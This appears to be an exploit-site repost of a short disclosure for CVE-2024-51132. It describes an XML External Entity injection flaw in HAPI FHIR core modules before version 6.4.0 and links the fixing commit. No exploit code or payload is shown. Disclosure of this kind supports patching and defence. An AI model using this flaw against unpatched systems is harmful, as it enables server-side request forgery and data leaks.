Share
## https://sploitus.com/exploit?id=1D3D4BFD-D1DB-5288-B343-D4605A863015
# CVE-2024-51132-POC

### Vulnerability Type
**XXE - XML External Entity Injection**. The XXE vulnerability found within mulitple artifacts or modules with https://github.com/hapifhir/org.hl7.fhir.core/ repository can be further exploited to do SSRF, leak information and etc.

### Affected Products and Versions
**org.hl7.fhir.convertors < 6.4.0**

**org.hl7.fhir.dstu2 < 6.4.0**

**org.hl7.fhir.dstu2016may < 6.4.0**

**org.hl7.fhir.dstu3 < 6.4.0**

**org.hl7.fhir.r4 < 6.4.0**

**org.hl7.fhir.r4b < 6.4.0**

**org.hl7.fhir.r5 < 6.4.0**

**org.hl7.fhir.utilities < 6.4.0**

**org.hl7.fhir.validation < 6.4.0**

### Comment
Found one of vulnerable places with my code analysis tool on probably 10/19/2024. However later I found there had been multiple commits by maintainers to fix the vulnerability and showed there were even more of them with the same issue than I thought.

### Reference
https://github.com/hapifhir/org.hl7.fhir.core/commit/7ede053a5fca50cc2802884c661a241d51703a67